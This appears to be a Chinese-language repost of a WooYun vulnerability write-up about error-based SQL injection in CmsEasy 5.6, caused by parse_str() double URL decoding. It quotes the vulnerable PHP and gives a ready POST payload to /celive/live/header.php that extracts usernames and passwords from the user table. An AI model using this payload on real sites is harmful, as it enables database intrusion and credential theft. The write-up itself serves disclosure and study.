来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.html
parse_str()引发的注入,
//parse_str()的作用是解析字符串并且把字符串注册成变量,第二个参数$arr是一个数组,parse_str()之前会先urldecode,也就是会二次url解码,实现单引号逃逸。
漏洞距离现在好像有点年代久远,有个限制就是对于php的版本要小于5.4,因为5.4以后默认关闭gpc,如果关闭gpc就会调用addslashes().
|
1
2
3
4
5
6
7
8
|
function Postdata($a) { global $db; $chatid = $_SESSION[‘chatid‘]; $name = $_SESSION[‘name‘]; $a[‘detail‘] = htmlspecialchars($a[‘detail‘]); if (!get_magic_quotes_gpc()) { $a[‘detail‘] = addslashes($a[‘detail‘]); }<br>} |
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
if ($rootTag == "xjxquery") { $sQuery = ""; $this->iPos++; while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) { if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) { $this->iPos++; continue; } $sQuery .= $this->aObjArray[$this->iPos]; $this->iPos++; } parse_str($sQuery, $aArray); if ($this->bDecodeUTF8Input) { foreach ($aArray as $key => $value) { $aArray[$key] = $this->_decodeUTF8Data($value); } } if (get_magic_quotes_gpc() == 1) { $newArray = array(); foreach ($aArray as $sKey => $sValue) { if (is_string($sValue)) $newArray[$sKey] = stripslashes($sValue); else $newArray[$sKey] = $sValue; } $aArray = $newArray; } } return $aArray;} |
漏洞出现在parse_str($sQuery, $aArray);
所以能进行报错注入
url: /celive/live/header.php
post:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
cmseasy CmsEasy_5.6_20151009 无限制报错注入(parse_str()的坑)
原文:https://www.cnblogs.com/lzkalislw/p/13511564.html